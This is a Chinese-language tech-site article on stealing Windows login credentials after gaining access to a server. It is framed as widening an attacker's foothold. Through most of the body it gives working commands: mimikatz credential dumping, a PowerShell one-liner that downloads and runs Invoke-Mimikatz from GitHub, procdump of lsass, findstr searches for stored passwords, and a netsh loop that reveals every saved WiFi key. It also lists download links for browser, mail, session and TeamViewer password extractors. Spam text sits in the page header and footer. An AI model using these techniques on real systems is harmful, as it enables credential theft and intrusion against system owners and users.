91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Windows下登錄憑證竊取技巧是什么

發布時間:2021-12-31 15:55:23 來源:億速云 閱讀:431 作者:柒染 欄目:系統運維

Windows下登錄憑證竊取技巧是什么,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

拿到一臺Windows服務器權限,收集各種登錄憑證以便擴大戰果。下面分享幾個竊取Windows登錄憑證的工具和技巧。

1、Windows 本地密碼Hash

Windows的系統密碼hash默認情況下一般由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系統下hash密碼格式用戶名稱:RID:LM-HASH值:NT-HASH值。

例如:

Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040  用戶名稱為:Administrator  RID為:500  LM-HASH值為:AF01DF70036EBACFAAD3B435B51404EE  NT-HASH值為:44F077E27F6FEF69E7BD834C7242B040

破解方式一:hash在線破解網站

https://www.objectif-securite.ch/ophcrack  http://cmd5.com

Windows下登錄憑證竊取技巧是什么

破解方式二:mimikatz

Github地址:

https://github.com/gentilkiwi/mimikatz

mimikatz使用起來也非常簡單,提取Windows系統的明文密碼只需兩行命令:

privilege::debug  sekurlsa::logonpasswords

Windows下登錄憑證竊取技巧是什么

破解方式三:wce

wce的常用參數使用說明如下:  參數解釋:      -l     列出登錄的會話和NTLM憑據(默認值)      -s     修改當前登錄會話的NTLM憑據 參數:<用戶名>:<域名>:<LM哈希>:<NT哈希>      -w     通過摘要式認證緩存一個明文的密碼

Windows下登錄憑證竊取技巧是什么

破解方式四:Powershell+mimikatz

直接利用poweshell來調用mimikatz抓取系統內的明文密碼。

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

破解方式五:prodump+mimikatz

procdump是微軟官方提供的一個小工具,微軟官方下載地址:

https://technet.microsoft.com/en-us/sysinternals/dd996900
# 將工具拷貝到目標機器上執行如下命令(需要管理員權限,我選擇的版本是64位)  procdump.exe -accepteula -ma lsass.exe lsass.dmp  # 將生成的內存dump文件拷貝到mimikatz同目錄下,雙擊打開mimikatz執行情況如圖:  mimikatz # sekurlsa::minidump lsass.dmp # Switch to MINIDUMP  mimikatz # sekurlsa::logonPasswords full

2、抓取瀏覽器密碼

很多瀏覽器都提供了記住密碼的功能,用戶在登錄一些網站的時候會選擇記住密碼。

LaZagne:提取瀏覽器所保存的密碼

github項目地址:

https://github.com/AlessandroZ/LaZagne

Windows下登錄憑證竊取技巧是什么

3、服務端明文存儲密碼

在一些配置文件或日志里,明文記錄著敏感的密碼信息,如web.config、config.ini等文件,可通過手動翻查敏感目錄,也可以通過findstr命令來查找敏感文件和內容。

findstr /i /s "password" *.config  findstr /i /s "password" *.ini  findstr /i /s "password" *.xml

4、第三方運維工具托管密碼解密

常見的有Linux運維工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,遠控軟件:Teamviewer等。

xshell 密碼解密工具:

https://github.com/dzxs/Xdecrypt

提取WinSCP,PuTTY等保存的會話信息:

https://github.com/Arvanaghi/SessionGopher

從內存中提取TeamViewer密碼的工具:

https://github.com/attackercan/teamviewer-dumper

一鍵破解客戶端星號密碼--星號密碼查看器。

Windows下登錄憑證竊取技巧是什么

5、一鍵獲取電腦wifi密碼

#查看電腦連接過的所有wifi  netsh wlan show profiles  #查看wifi信號為Aaron的密碼  netsh wlan show profiles name="Aaron" key=clear  #CMD一鍵獲取 所有連接過的WIFI密碼  for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

6、Windows鍵盤記錄工具

可以記錄用戶鍵盤操作,從而捕獲用戶的敏感信息,在github和T00ls都可以找到這一類的源碼和工具。

7、Windows密碼提取工具合集

各種Windows程序的密碼提取工具,包括各種瀏覽器、郵箱、Windows網絡密碼、無線網絡密鑰等。

IE瀏覽器提取密碼工具:

https://www.nirsoft.net/toolsdownload/iepv.zip

Firefox 瀏覽器密碼提取工具:

https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip

Chrome 瀏覽器密碼提取工具:

https://www.nirsoft.net/toolsdownload/chromepass.zip

SVN密碼解密器:

http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip

郵箱密碼提取工具:

https://www.nirsoft.net/toolsdownload/mailpv.zip

提取.rdp文件中存儲的密碼:

https://www.nirsoft.net/toolsdownload/rdpv.zip

MSSQL憑據密碼獲取工具:

http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

青田县| 虎林市| 富锦市| 丹阳市| 榆树市| 温泉县| 湖南省| 富宁县| 潍坊市| 马山县| 黔西县| 布拖县| 和政县| 赤峰市| 钟山县| 营山县| 连州市| 山丹县| 郑州市| 万载县| 北安市| 祁门县| 莫力| 武功县| 罗江县| 孟州市| 四子王旗| 屏东市| 安岳县| 河津市| 龙门县| 上杭县| 威信县| 义马市| 西充县| 黑山县| 红安县| 玛曲县| 颍上县| 新建县| 盐边县|